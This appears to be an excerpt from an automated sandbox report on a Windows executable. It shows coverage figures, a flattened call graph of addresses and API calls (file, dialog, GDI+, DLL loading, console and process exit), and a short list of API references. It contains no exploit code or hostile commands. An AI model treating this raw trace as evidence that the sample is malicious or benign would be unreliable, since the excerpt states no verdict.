                                                                                    Execution Coverage:9.4%
                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                    Signature Coverage:2.8%
                                                                                    Total number of Nodes:1481
                                                                                    Total number of Limit Nodes:47
24087->24243 24089->24043 24091 723b39 24090->24091 24092 723b3d 24090->24092 24091->24043 24101 729e80 79 API calls 24092->24101 24093 723b4f 24094 723b78 24093->24094 24095 723b6a 24093->24095 24374 72286b 101 API calls 3 library calls 24094->24374 24096 723baa 24095->24096 24373 7232f7 89 API calls 2 library calls 24095->24373 24096->24043 24099 723b76 24099->24096 24375 7220d7 74 API calls 24099->24375 24101->24093 24103 728498 __EH_prolog 24102->24103 24106 7284d5 24103->24106 24113 728513 24103->24113 24400 738c8d 103 API calls 24103->24400 24105 7284f5 24107 7284fa 24105->24107 24108 72851c 24105->24108 24106->24105 24110 72857a 24106->24110 24106->24113 24107->24113 24401 727a0d 152 API calls 24107->24401 24108->24113 24402 738c8d 103 API calls 24108->24402 24110->24113 24376 725d1a 24110->24376 24113->24043 24114 728605 24114->24113 24382 728167 24114->24382 24117 728797 24118 72a56d 7 API calls 24117->24118 24120 728802 24117->24120 24118->24120 24119 72d051 82 API calls 24127 72885d 24119->24127 24388 727c0d 24120->24388 24122 72898b 24405 722021 74 API calls 24122->24405 24123 728a5f 24128 728ab6 24123->24128 24141 728a6a 24123->24141 24124 728992 24124->24123 24129 7289e1 24124->24129 24127->24113 24127->24119 24127->24122 24127->24124 24403 728117 84 API calls 24127->24403 24404 722021 74 API calls 24127->24404 24136 728a4c 24128->24136 24408 727fc0 97 API calls 24128->24408 24133 72a231 3 API calls 24129->24133 24129->24136 24138 728b14 24129->24138 24130 729105 24135 72959a 80 API calls 24130->24135 24131 728ab4 24132 72959a 80 API calls 24131->24132 24132->24113 24137 728a19 24133->24137 24135->24113 24136->24131 24136->24138 24137->24136 24406 7292a3 97 API calls 24137->24406 24138->24130 24150 728b82 24138->24150 24409 7298bc 24138->24409 24139 72ab1a 8 API calls 24142 728bd1 24139->24142 24141->24131 24407 727db2 101 API calls 24141->24407 24145 72ab1a 8 API calls 24142->24145 24162 728be7 24145->24162 24148 728b70 24413 726e98 77 API calls 
24148->24413 24150->24139 24151 728cbc 24152 728e40 24151->24152 24153 728d18 24151->24153 24156 728e52 24152->24156 24157 728e66 24152->24157 24176 728d49 24152->24176 24154 728d8a 24153->24154 24155 728d28 24153->24155 24164 728167 19 API calls 24154->24164 24159 728d6e 24155->24159 24167 728d37 24155->24167 24160 729215 123 API calls 24156->24160 24158 733377 75 API calls 24157->24158 24161 728e7f 24158->24161 24159->24176 24416 7277b8 111 API calls 24159->24416 24160->24176 24419 733020 123 API calls 24161->24419 24162->24151 24163 728c93 24162->24163 24170 72981a 79 API calls 24162->24170 24163->24151 24414 729a3c 82 API calls 24163->24414 24168 728dbd 24164->24168 24415 722021 74 API calls 24167->24415 24172 728de6 24168->24172 24173 728df5 24168->24173 24168->24176 24170->24163 24417 727542 85 API calls 24172->24417 24418 729155 93 API calls __EH_prolog 24173->24418 24179 728f85 24176->24179 24420 722021 74 API calls 24176->24420 24178 729090 24178->24130 24181 72a4ed 3 API calls 24178->24181 24179->24130 24179->24178 24180 72903e 24179->24180 24394 729f09 SetEndOfFile 24179->24394 24395 729da2 24180->24395 24182 7290eb 24181->24182 24182->24130 24421 722021 74 API calls 24182->24421 24185 729085 24187 729620 77 API calls 24185->24187 24187->24178 24188 7290fb 24422 726dcb 76 API calls _wcschr 24188->24422 24191 7216a4 24190->24191 24438 72cee1 24191->24438 24195 729f59 24194->24195 24196 729f63 24195->24196 24446 726d0c 78 API calls 24195->24446 24196->24029 24198->24042 24199->24038 24201 72b50f __EH_prolog 24200->24201 24206 72f1d0 82 API calls 24201->24206 24203 72b521 24207 72b61e 24203->24207 24206->24203 24208 72b630 __cftof 24207->24208 24211 7310dc 24208->24211 24214 73109e GetCurrentProcess GetProcessAffinityMask 24211->24214 24215 72b597 24214->24215 24215->24061 24221 721732 24216->24221 24218 7213d6 24218->24079 24219->24078 24220->24074 24222 721748 24221->24222 24233 7217a0 __InternalCxxFrameHandler 24221->24233 24223 721771 24222->24223 24234 
726c36 76 API calls __vswprintf_c_l 24222->24234 24224 7217c7 24223->24224 24229 72178d ___std_exception_copy 24223->24229 24226 743e3e 22 API calls 24224->24226 24228 7217ce 24226->24228 24227 721767 24235 726ca7 75 API calls 24227->24235 24228->24233 24237 726ca7 75 API calls 24228->24237 24229->24233 24236 726ca7 75 API calls 24229->24236 24233->24218 24234->24227 24235->24223 24236->24233 24237->24233 24239 72cf4d 24238->24239 24241 72cf54 24238->24241 24240 72981a 79 API calls 24239->24240 24240->24241 24241->24083 24242->24085 24244 7219bb 24243->24244 24245 7219bf 24243->24245 24244->24089 24247 7218f6 24245->24247 24248 721908 24247->24248 24249 721945 24247->24249 24250 723b2d 101 API calls 24248->24250 24255 723fa3 24249->24255 24253 721928 24250->24253 24253->24244 24257 723fac 24255->24257 24256 723b2d 101 API calls 24256->24257 24257->24256 24259 721966 24257->24259 24272 730e08 24257->24272 24259->24253 24260 721e50 24259->24260 24261 721e5a __EH_prolog 24260->24261 24280 723bba 24261->24280 24263 721e84 24264 721732 78 API calls 24263->24264 24267 721f0b 24263->24267 24265 721e9b 24264->24265 24308 7218a9 78 API calls 24265->24308 24267->24253 24268 721eb3 24270 721ebf _wcslen 24268->24270 24309 731b84 MultiByteToWideChar 24268->24309 24310 7218a9 78 API calls 24270->24310 24273 730e0f 24272->24273 24274 730e2a 24273->24274 24278 726c31 RaiseException CallUnexpected 24273->24278 24276 730e3b SetThreadExecutionState 24274->24276 24279 726c31 RaiseException CallUnexpected 24274->24279 24276->24257 24278->24274 24279->24276 24281 723bc4 __EH_prolog 24280->24281 24282 723bf6 24281->24282 24283 723bda 24281->24283 24285 723e51 24282->24285 24288 723c22 24282->24288 24336 72138b 74 API calls 24283->24336 24353 72138b 74 API calls 24285->24353 24287 723be5 24287->24263 24288->24287 24311 733377 24288->24311 24290 723ca3 24291 723d2e 24290->24291 24307 723c9a 24290->24307 24339 72d051 24290->24339 24321 72ab1a 24291->24321 24292 723c9f 24292->24290 24338 
7220bd 78 API calls 24292->24338 24294 723c71 24294->24290 24294->24292 24295 723c8f 24294->24295 24337 72138b 74 API calls 24295->24337 24299 723d41 24301 723dd7 24299->24301 24302 723dc7 24299->24302 24345 733020 123 API calls 24301->24345 24325 729215 24302->24325 24305 723dd5 24305->24307 24346 722021 74 API calls 24305->24346 24347 732297 24307->24347 24308->24268 24309->24270 24310->24267 24312 73338c 24311->24312 24315 733396 ___std_exception_copy 24311->24315 24354 726ca7 75 API calls 24312->24354 24314 7334c6 24356 74238d RaiseException 24314->24356 24315->24314 24316 73341c 24315->24316 24320 733440 __cftof 24315->24320 24355 7332aa 75 API calls 3 library calls 24316->24355 24319 7334f2 24320->24294 24322 72ab28 24321->24322 24324 72ab32 24321->24324 24323 73eb38 8 API calls 24322->24323 24323->24324 24324->24299 24326 72921f __EH_prolog 24325->24326 24357 727c64 24326->24357 24329 7213ba 78 API calls 24330 729231 24329->24330 24360 72d114 24330->24360 24332 729243 24333 72928a 24332->24333 24335 72d114 118 API calls 24332->24335 24369 72d300 97 API calls __InternalCxxFrameHandler 24332->24369 24333->24305 24335->24332 24336->24287 24337->24307 24338->24290 24340 72d072 24339->24340 24341 72d084 24339->24341 24370 72603a 82 API calls 24340->24370 24371 72603a 82 API calls 24341->24371 24344 72d07c 24344->24291 24345->24305 24346->24307 24348 7322a1 24347->24348 24349 7322ba 24348->24349 24352 7322ce 24348->24352 24372 730eed 86 API calls 24349->24372 24351 7322c1 24351->24352 24353->24287 24354->24315 24355->24320 24356->24319 24358 72b146 GetVersionExW 24357->24358 24359 727c69 24358->24359 24359->24329 24367 72d12a __InternalCxxFrameHandler 24360->24367 24361 72d29a 24362 72d2ce 24361->24362 24363 72d0cb 6 API calls 24361->24363 24364 730e08 SetThreadExecutionState RaiseException 24362->24364 24363->24362 24366 72d291 24364->24366 24365 738c8d 103 API calls 24365->24367 24366->24332 24367->24361 24367->24365 24367->24366 24368 72ac05 91 API calls 
24367->24368 24368->24367 24369->24332 24370->24344 24371->24344 24372->24351 24373->24099 24374->24099 24375->24096 24377 725d2a 24376->24377 24423 725c4b 24377->24423 24379 725d5d 24381 725d95 24379->24381 24428 72b1dc CharUpperW CompareStringW _wcslen ___vcrt_InitializeCriticalSectionEx 24379->24428 24381->24114 24383 728186 24382->24383 24384 728232 24383->24384 24435 72be5e 19 API calls __InternalCxxFrameHandler 24383->24435 24434 731fac CharUpperW 24384->24434 24387 72823b 24387->24117 24389 727c22 24388->24389 24390 727c5a 24389->24390 24436 726e7a 74 API calls 24389->24436 24390->24127 24392 727c52 24437 72138b 74 API calls 24392->24437 24394->24180 24396 729db3 24395->24396 24399 729dc2 24395->24399 24397 729db9 FlushFileBuffers 24396->24397 24396->24399 24397->24399 24398 729e3f SetFileTime 24398->24185 24399->24398 24400->24106 24401->24113 24402->24113 24403->24127 24404->24127 24405->24124 24406->24136 24407->24131 24408->24136 24410 7298c5 GetFileType 24409->24410 24411 728b5a 24409->24411 24410->24411 24411->24150 24412 722021 74 API calls 24411->24412 24412->24148 24413->24150 24414->24151 24415->24176 24416->24176 24417->24176 24418->24176 24419->24176 24420->24179 24421->24188 24422->24130 24429 725b48 24423->24429 24425 725c6c 24425->24379 24427 725b48 2 API calls 24427->24425 24428->24379 24430 725b52 24429->24430 24432 725c3a 24430->24432 24433 72b1dc CharUpperW CompareStringW _wcslen ___vcrt_InitializeCriticalSectionEx 24430->24433 24432->24425 24432->24427 24433->24430 24434->24387 24435->24384 24436->24392 24437->24390 24439 72cef2 24438->24439 24444 72a99e 86 API calls 24439->24444 24441 72cf24 24445 72a99e 86 API calls 24441->24445 24443 72cf2f 24444->24441 24445->24443 24446->24196 24448 72a6a8 24447->24448 24449 72a6c1 FindFirstFileW 24448->24449 24450 72a727 FindNextFileW 24448->24450 24452 72a6d0 24449->24452 24457 72a709 24449->24457 24451 72a732 GetLastError 24450->24451 24450->24457 24451->24457 24453 72bb03 GetCurrentDirectoryW 
24452->24453 24454 72a6e0 24453->24454 24455 72a6e4 FindFirstFileW 24454->24455 24456 72a6fe GetLastError 24454->24456 24455->24456 24455->24457 24456->24457 24457->24050 24467 73a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24458->24467 24460 73a5cd 24461 73a5d9 24460->24461 24468 73a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24460->24468 24461->23709 24461->23711 24463->23710 24464->23719 24465->23719 24466->23722 24467->24460 24468->24461 24469->23730 24471 729f42 78 API calls 24470->24471 24472 721fe8 24471->24472 24473 722005 24472->24473 24474 721a04 101 API calls 24472->24474 24473->23738 24473->23739 24475 721ff5 24474->24475 24475->24473 24477 72138b 74 API calls 24475->24477 24477->24473 24479 73b583 GetMessageW 24478->24479 24480 73b5bc GetDlgItem 24478->24480 24481 73b599 IsDialogMessageW 24479->24481 24482 73b5a8 TranslateMessage DispatchMessageW 24479->24482 24480->23749 24480->23750 24481->24480 24481->24482 24482->24480 24483 7213e1 84 API calls 2 library calls 25292 7394e0 GetClientRect 25321 7321e0 26 API calls std::bad_exception::bad_exception 25339 73f2e0 46 API calls __RTC_Initialize 24484 73eae7 24485 73eaf1 24484->24485 24488 73e85d 24485->24488 24514 73e5bb 24488->24514 24490 73e86d 24491 73e8ca 24490->24491 24501 73e8ee 24490->24501 24492 73e7fb DloadReleaseSectionWriteAccess 6 API calls 24491->24492 24493 73e8d5 RaiseException 24492->24493 24507 73eac3 24493->24507 24494 73e9d9 24498 73ea95 24494->24498 24500 73ea37 GetProcAddress 24494->24500 24495 73e966 LoadLibraryExA 24496 73e9c7 24495->24496 24497 73e979 GetLastError 24495->24497 24496->24494 24502 73e9d2 FreeLibrary 24496->24502 24499 73e9a2 24497->24499 24511 73e98c 24497->24511 24523 73e7fb 24498->24523 24503 73e7fb DloadReleaseSectionWriteAccess 6 API calls 24499->24503 24500->24498 24504 73ea47 GetLastError 24500->24504 24501->24494 24501->24495 24501->24496 24501->24498 24502->24494 24505 73e9ad RaiseException 24503->24505 24509 73ea5a 24504->24509 24505->24507 24508 
73e7fb DloadReleaseSectionWriteAccess 6 API calls 24510 73ea7b RaiseException 24508->24510 24509->24498 24509->24508 24512 73e5bb ___delayLoadHelper2@8 6 API calls 24510->24512 24511->24496 24511->24499 24513 73ea92 24512->24513 24513->24498 24515 73e5c7 24514->24515 24516 73e5ed 24514->24516 24531 73e664 24515->24531 24516->24490 24518 73e5e8 24539 73e5ee GetModuleHandleW GetProcAddress GetProcAddress 24518->24539 24519 73e5cc 24519->24518 24534 73e78d 24519->24534 24522 73e836 24522->24490 24524 73e82f 24523->24524 24525 73e80d 24523->24525 24524->24507 24526 73e664 DloadReleaseSectionWriteAccess 3 API calls 24525->24526 24527 73e812 24526->24527 24528 73e82a 24527->24528 24529 73e78d DloadProtectSection 3 API calls 24527->24529 24542 73e831 GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 24528->24542 24529->24528 24540 73e5ee GetModuleHandleW GetProcAddress GetProcAddress 24531->24540 24533 73e669 24533->24519 24535 73e7a2 DloadProtectSection 24534->24535 24536 73e7a8 24535->24536 24537 73e7dd VirtualProtect 24535->24537 24541 73e6a3 VirtualQuery GetSystemInfo 24535->24541 24536->24518 24537->24536 24539->24522 24540->24533 24541->24537 24542->24524 25293 73f4e7 29 API calls _abort 25340 74bee0 GetCommandLineA GetCommandLineW 25322 72f1e8 FreeLibrary 25294 73f4d3 20 API calls 24698 73e1d1 14 API calls ___delayLoadHelper2@8 24700 73e2d7 24701 73e1db 24700->24701 24702 73e85d ___delayLoadHelper2@8 14 API calls 24701->24702 24702->24701 25360 74a3d0 21 API calls 2 library calls 25361 752bd0 VariantClear 24704 7210d5 24709 725abd 24704->24709 24710 725ac7 __EH_prolog 24709->24710 24711 72b505 84 API calls 24710->24711 24712 725ad3 24711->24712 24716 725cac GetCurrentProcess GetProcessAffinityMask 24712->24716 25342 740ada 51 API calls 2 library calls 24779 73dec2 24780 73decf 24779->24780 24781 72e617 53 API calls 24780->24781 24782 73dedc 24781->24782 24783 724092 _swprintf 51 API calls 24782->24783 24784 73def1 SetDlgItemTextW 
24783->24784 24785 73b568 5 API calls 24784->24785 24786 73df0e 24785->24786 25324 73b5c0 100 API calls 25362 7377c0 118 API calls 25363 73ffc0 RaiseException _com_error::_com_error CallUnexpected 25343 7362ca 123 API calls __InternalCxxFrameHandler 24798 73f3b2 24799 73f3be __FrameHandler3::FrameUnwindToState 24798->24799 24830 73eed7 24799->24830 24801 73f3c5 24802 73f518 24801->24802 24805 73f3ef 24801->24805 24903 73f838 4 API calls 2 library calls 24802->24903 24804 73f51f 24896 747f58 24804->24896 24814 73f42e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 24805->24814 24841 748aed 24805->24841 24812 73f40e 24815 73f48f 24814->24815 24899 747af4 38 API calls 2 library calls 24814->24899 24849 73f953 GetStartupInfoW __cftof 24815->24849 24817 73f495 24850 748a3e 51 API calls 24817->24850 24819 73f49d 24851 73df1e 24819->24851 24824 73f4b1 24824->24804 24825 73f4b5 24824->24825 24826 73f4be 24825->24826 24901 747efb 28 API calls _abort 24825->24901 24902 73f048 12 API calls ___scrt_uninitialize_crt 24826->24902 24829 73f4c6 24829->24812 24831 73eee0 24830->24831 24905 73f654 IsProcessorFeaturePresent 24831->24905 24833 73eeec 24906 742a5e 24833->24906 24835 73eef1 24836 73eef5 24835->24836 24914 748977 24835->24914 24836->24801 24839 73ef0c 24839->24801 24842 748b04 24841->24842 24843 73fbbc CatchGuardHandler 5 API calls 24842->24843 24844 73f408 24843->24844 24844->24812 24845 748a91 24844->24845 24846 748ac0 24845->24846 24847 73fbbc CatchGuardHandler 5 API calls 24846->24847 24848 748ae9 24847->24848 24848->24814 24849->24817 24850->24819 24965 730863 24851->24965 24855 73df3d 25014 73ac16 24855->25014 24857 73df46 __cftof 24858 73df59 GetCommandLineW 24857->24858 24859 73dfe6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 24858->24859 24860 73df68 24858->24860 24861 724092 _swprintf 51 API calls 24859->24861 25018 73c5c4 24860->25018 24863 73e04d SetEnvironmentVariableW GetModuleHandleW LoadIconW 24861->24863 25029 73b6dd 
LoadBitmapW 24863->25029 24866 73dfe0 25023 73dbde 24866->25023 24867 73df76 OpenFileMappingW 24869 73dfd6 CloseHandle 24867->24869 24870 73df8f MapViewOfFile 24867->24870 24869->24859 24873 73dfa0 __InternalCxxFrameHandler 24870->24873 24874 73dfcd UnmapViewOfFile 24870->24874 24878 73dbde 2 API calls 24873->24878 24874->24869 24880 73dfbc 24878->24880 24879 7390b7 8 API calls 24881 73e0aa DialogBoxParamW 24879->24881 24880->24874 24882 73e0e4 24881->24882 24883 73e0f6 Sleep 24882->24883 24884 73e0fd 24882->24884 24883->24884 24887 73e10b 24884->24887 25059 73ae2f CompareStringW SetCurrentDirectoryW __cftof _wcslen 24884->25059 24886 73e12a DeleteObject 24888 73e146 24886->24888 24889 73e13f DeleteObject 24886->24889 24887->24886 24890 73e177 24888->24890 24893 73e189 24888->24893 24889->24888 25060 73dc3b 6 API calls 24890->25060 24892 73e17d CloseHandle 24892->24893 25056 73ac7c 24893->25056 24895 73e1c3 24900 73f993 GetModuleHandleW 24895->24900 25190 747cd5 24896->25190 24899->24815 24900->24824 24901->24826 24902->24829 24903->24804 24905->24833 24918 743b07 24906->24918 24909 742a67 24909->24835 24911 742a6f 24912 742a7a 24911->24912 24932 743b43 DeleteCriticalSection 24911->24932 24912->24835 24961 74c05a 24914->24961 24917 742a7d 7 API calls 2 library calls 24917->24836 24920 743b10 24918->24920 24921 743b39 24920->24921 24922 742a63 24920->24922 24933 743d46 24920->24933 24938 743b43 DeleteCriticalSection 24921->24938 24922->24909 24924 742b8c 24922->24924 24954 743c57 24924->24954 24928 742baf 24929 742bbc 24928->24929 24960 742bbf 6 API calls ___vcrt_FlsFree 24928->24960 24929->24911 24931 742ba1 24931->24911 24932->24909 24939 743c0d 24933->24939 24936 743d7e InitializeCriticalSectionAndSpinCount 24937 743d69 24936->24937 24937->24920 24938->24922 24940 743c26 24939->24940 24943 743c4f 24939->24943 24940->24943 24946 743b72 24940->24946 24943->24936 24943->24937 24944 743c3b GetProcAddress 24944->24943 24945 743c49 24944->24945 24945->24943 24952 
743b7e ___vcrt_InitializeCriticalSectionEx 24946->24952 24947 743b95 LoadLibraryExW 24949 743bb3 GetLastError 24947->24949 24950 743bfa 24947->24950 24948 743bf3 24948->24943 24948->24944 24949->24952 24950->24948 24951 743c02 FreeLibrary 24950->24951 24951->24948 24952->24947 24952->24948 24953 743bd5 LoadLibraryExW 24952->24953 24953->24950 24953->24952 24955 743c0d ___vcrt_InitializeCriticalSectionEx 5 API calls 24954->24955 24956 743c71 24955->24956 24957 743c8a TlsAlloc 24956->24957 24958 742b96 24956->24958 24958->24931 24959 743d08 6 API calls ___vcrt_InitializeCriticalSectionEx 24958->24959 24959->24928 24960->24931 24964 74c073 24961->24964 24962 73fbbc CatchGuardHandler 5 API calls 24963 73eefe 24962->24963 24963->24839 24963->24917 24964->24962 24966 73ec50 24965->24966 24967 73086d GetModuleHandleW 24966->24967 24968 7308e7 24967->24968 24969 730888 GetProcAddress 24967->24969 24970 730c14 GetModuleFileNameW 24968->24970 25070 7475fb 42 API calls __vsnwprintf_l 24968->25070 24971 7308a1 24969->24971 24972 7308b9 GetProcAddress 24969->24972 24981 730c32 24970->24981 24971->24972 24974 7308cb 24972->24974 24974->24968 24975 730b54 24975->24970 24976 730b5f GetModuleFileNameW CreateFileW 24975->24976 24977 730c08 CloseHandle 24976->24977 24978 730b8f SetFilePointer 24976->24978 24977->24970 24978->24977 24979 730b9d ReadFile 24978->24979 24979->24977 24983 730bbb 24979->24983 24984 730c94 GetFileAttributesW 24981->24984 24986 730c5d CompareStringW 24981->24986 24987 730cac 24981->24987 25061 72b146 24981->25061 25064 73081b 24981->25064 24983->24977 24985 73081b 2 API calls 24983->24985 24984->24981 24984->24987 24985->24983 24986->24981 24988 730cb7 24987->24988 24991 730cec 24987->24991 24990 730cd0 GetFileAttributesW 24988->24990 24992 730ce8 24988->24992 24989 730dfb 25013 73a64d GetCurrentDirectoryW 24989->25013 24990->24988 24990->24992 24991->24989 24993 72b146 GetVersionExW 24991->24993 24992->24991 24994 730d06 24993->24994 24995 730d73 
24994->24995 24996 730d0d 24994->24996 24997 724092 _swprintf 51 API calls 24995->24997 24998 73081b 2 API calls 24996->24998 25000 730d9b AllocConsole 24997->25000 24999 730d17 24998->24999 25001 73081b 2 API calls 24999->25001 25002 730df3 ExitProcess 25000->25002 25003 730da8 GetCurrentProcessId AttachConsole 25000->25003 25004 730d21 25001->25004 25071 743e13 25003->25071 25007 72e617 53 API calls 25004->25007 25006 730dc9 GetStdHandle WriteConsoleW Sleep FreeConsole 25006->25002 25008 730d3c 25007->25008 25009 724092 _swprintf 51 API calls 25008->25009 25010 730d4f 25009->25010 25011 72e617 53 API calls 25010->25011 25012 730d5e 25011->25012 25012->25002 25013->24855 25015 73081b 2 API calls 25014->25015 25016 73ac2a OleInitialize 25015->25016 25017 73ac4d GdiplusStartup SHGetMalloc 25016->25017 25017->24857 25019 73c5ce 25018->25019 25020 73c6e4 25019->25020 25021 731fac CharUpperW 25019->25021 25073 72f3fa 82 API calls 2 library calls 25019->25073 25020->24866 25020->24867 25021->25019 25024 73ec50 25023->25024 25025 73dbeb SetEnvironmentVariableW 25024->25025 25027 73dc0e 25025->25027 25026 73dc36 25026->24859 25027->25026 25028 73dc2a SetEnvironmentVariableW 25027->25028 25028->25026 25030 73b70b GetObjectW 25029->25030 25031 73b6fe 25029->25031 25033 73b71a 25030->25033 25074 73a6c2 FindResourceW 25031->25074 25035 73a5c6 4 API calls 25033->25035 25036 73b72d 25035->25036 25037 73b770 25036->25037 25038 73b74c 25036->25038 25039 73a6c2 12 API calls 25036->25039 25048 72da42 25037->25048 25088 73a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25038->25088 25042 73b73d 25039->25042 25041 73b754 25089 73a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25041->25089 25042->25038 25044 73b743 DeleteObject 25042->25044 25044->25038 25045 73b75d 25090 73a80c 8 API calls 25045->25090 25047 73b764 DeleteObject 25047->25037 25099 72da67 25048->25099 25053 7390b7 25054 73eb38 8 API calls 25053->25054 25055 7390d6 25054->25055 25055->24879 25057 73acab 
GdiplusShutdown CoUninitialize 25056->25057 25057->24895 25059->24887 25060->24892 25062 72b196 25061->25062 25063 72b15a GetVersionExW 25061->25063 25062->24981 25063->25062 25065 73ec50 25064->25065 25066 730828 GetSystemDirectoryW 25065->25066 25067 730840 25066->25067 25068 73085e 25066->25068 25069 730851 LoadLibraryW 25067->25069 25068->24981 25069->25068 25070->24975 25072 743e1b 25071->25072 25072->25006 25072->25072 25073->25019 25075 73a6e5 SizeofResource 25074->25075 25076 73a7d3 25074->25076 25075->25076 25077 73a6fc LoadResource 25075->25077 25076->25030 25076->25033 25077->25076 25078 73a711 LockResource 25077->25078 25078->25076 25079 73a722 GlobalAlloc 25078->25079 25079->25076 25080 73a73d GlobalLock 25079->25080 25081 73a7cc GlobalFree 25080->25081 25083 73a74c __InternalCxxFrameHandler 25080->25083 25081->25076 25082 73a7c5 GlobalUnlock 25082->25081 25083->25082 25091 73a626 GdipAlloc 25083->25091 25086 73a7b0 25086->25082 25087 73a79a GdipCreateHBITMAPFromBitmap 25087->25086 25088->25041 25089->25045 25090->25047 25092 73a645 25091->25092 25093 73a638 25091->25093 25092->25082 25092->25086 25092->25087 25095 73a3b9 25093->25095 25096 73a3e1 GdipCreateBitmapFromStream 25095->25096 25097 73a3da GdipCreateBitmapFromStreamICM 25095->25097 25098 73a3e6 25096->25098 25097->25098 25098->25092 25100 72da75 _wcschr __EH_prolog 25099->25100 25101 72daa4 GetModuleFileNameW 25100->25101 25102 72dad5 25100->25102 25103 72dabe 25101->25103 25145 7298e0 25102->25145 25103->25102 25105 72db31 25156 746310 25105->25156 25106 72959a 80 API calls 25107 72da4e 25106->25107 25143 72e29e GetModuleHandleW FindResourceW 25107->25143 25109 72e261 78 API calls 25111 72db05 25109->25111 25110 72db44 25112 746310 26 API calls 25110->25112 25111->25105 25111->25109 25123 72dd4a 25111->25123 25120 72db56 ___vcrt_InitializeCriticalSectionEx 25112->25120 25113 72dc85 25113->25123 25176 729d70 81 API calls 25113->25176 25115 729e80 79 API calls 25115->25120 25117 72dc9f 
___std_exception_copy 25118 729bd0 82 API calls 25117->25118 25117->25123 25121 72dcc8 ___std_exception_copy 25118->25121 25120->25113 25120->25115 25120->25123 25170 729bd0 25120->25170 25175 729d70 81 API calls 25120->25175 25121->25123 25140 72dcd3 _wcslen ___std_exception_copy ___vcrt_InitializeCriticalSectionEx 25121->25140 25177 731b84 MultiByteToWideChar 25121->25177 25123->25106 25124 72e159 25129 72e1de 25124->25129 25183 748cce 26 API calls 2 library calls 25124->25183 25126 72e16e 25184 747625 26 API calls 2 library calls 25126->25184 25128 72e214 25133 746310 26 API calls 25128->25133 25129->25128 25132 72e261 78 API calls 25129->25132 25131 72e1c6 25185 72e27c 78 API calls 25131->25185 25132->25129 25135 72e22d 25133->25135 25136 746310 26 API calls 25135->25136 25136->25123 25139 731da7 WideCharToMultiByte 25139->25140 25140->25123 25140->25124 25140->25139 25178 72e5b1 50 API calls __vsnprintf 25140->25178 25179 746159 26 API calls 3 library calls 25140->25179 25180 748cce 26 API calls 2 library calls 25140->25180 25181 747625 26 API calls 2 library calls 25140->25181 25182 72e27c 78 API calls 25140->25182 25144 72da55 25143->25144 25144->25053 25146 7298ea 25145->25146 25147 72994b CreateFileW 25146->25147 25148 72996c GetLastError 25147->25148 25152 7299bb 25147->25152 25149 72bb03 GetCurrentDirectoryW 25148->25149 25150 72998c 25149->25150 25151 729990 CreateFileW GetLastError 25150->25151 25150->25152 25151->25152 25154 7299b5 25151->25154 25153 7299ff 25152->25153 25155 7299e5 SetFileTime 25152->25155 25153->25111 25154->25152 25155->25153 25157 746349 25156->25157 25158 74634d 25157->25158 25169 746375 25157->25169 25186 7491a8 20 API calls __dosmaperr 25158->25186 25160 746699 25162 73fbbc CatchGuardHandler 5 API calls 25160->25162 25161 746352 25187 749087 26 API calls __cftof 25161->25187 25164 7466a6 25162->25164 25164->25110 25165 74635d 25166 73fbbc CatchGuardHandler 5 API calls 25165->25166 25167 746369 25166->25167 25167->25110 
25169->25160 25188 746230 5 API calls CatchGuardHandler 25169->25188 25171 729bdc 25170->25171 25172 729be3 25170->25172 25171->25120 25172->25171 25174 729785 GetStdHandle ReadFile GetLastError GetLastError GetFileType 25172->25174 25189 726d1a 77 API calls 25172->25189 25174->25172 25175->25120 25176->25117 25177->25140 25178->25140 25179->25140 25180->25140 25181->25140 25182->25140 25183->25126 25184->25131 25185->25129 25186->25161 25187->25165 25188->25169 25189->25172 25191 747ce1 _abort 25190->25191 25192 747ce8 25191->25192 25193 747cfa 25191->25193 25226 747e2f GetModuleHandleW 25192->25226 25214 74ac31 EnterCriticalSection 25193->25214 25196 747ced 25196->25193 25227 747e73 GetModuleHandleExW 25196->25227 25197 747d9f 25215 747ddf 25197->25215 25200 747d01 25200->25197 25202 747d76 25200->25202 25235 7487e0 20 API calls _abort 25200->25235 25206 747d8e 25202->25206 25211 748a91 _abort 5 API calls 25202->25211 25204 747dbc 25218 747dee 25204->25218 25205 747de8 25236 752390 5 API calls CatchGuardHandler 25205->25236 25207 748a91 _abort 5 API calls 25206->25207 25207->25197 25211->25206 25214->25200 25237 74ac81 LeaveCriticalSection 25215->25237 25217 747db8 25217->25204 25217->25205 25238 74b076 25218->25238 25221 747e1c 25224 747e73 _abort 8 API calls 25221->25224 25222 747dfc GetPEB 25222->25221 25223 747e0c GetCurrentProcess TerminateProcess 25222->25223 25223->25221 25225 747e24 ExitProcess 25224->25225 25226->25196 25228 747ec0 25227->25228 25229 747e9d GetProcAddress 25227->25229 25231 747ec6 FreeLibrary 25228->25231 25232 747ecf 25228->25232 25230 747eb2 25229->25230 25230->25228 25231->25232 25233 73fbbc CatchGuardHandler 5 API calls 25232->25233 25234 747cf9 25233->25234 25234->25193 25235->25202 25237->25217 25239 74b09b 25238->25239 25243 74b091 25238->25243 25240 74ac98 __dosmaperr 5 API calls 25239->25240 25240->25243 25241 73fbbc CatchGuardHandler 5 API calls 25242 747df8 25241->25242 25242->25221 25242->25222 25243->25241 25325 73b1b0 
GetDlgItem EnableWindow ShowWindow SendMessageW 25366 731bbd GetCPInfo IsDBCSLeadByte 25297 73dca1 DialogBoxParamW 25367 73f3a0 27 API calls 25300 74a4a0 71 API calls _free 25327 73eda7 48 API calls _unexpected 25345 74a6a0 31 API calls 2 library calls 25301 7508a0 IsProcessorFeaturePresent 25368 726faa 111 API calls 3 library calls 25303 74b49d 6 API calls CatchGuardHandler 25329 739580 CompareStringW ShowWindow SetWindowTextW GlobalAlloc WideCharToMultiByte 25346 73c793 102 API calls 5 library calls 25305 73c793 97 API calls 4 library calls 25331 73b18d 78 API calls

                                                                                    APIs
                                                                                      • Part of subcall function 00730863: GetModuleHandleW.KERNEL32(kernel32), ref: 0073087C
                                                                                      • Part of subcall function 00730863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0073088E
                                                                                      • Part of subcall function 00730863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 007308BF
                                                                                      • Part of subcall function 0073A64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 0073A655
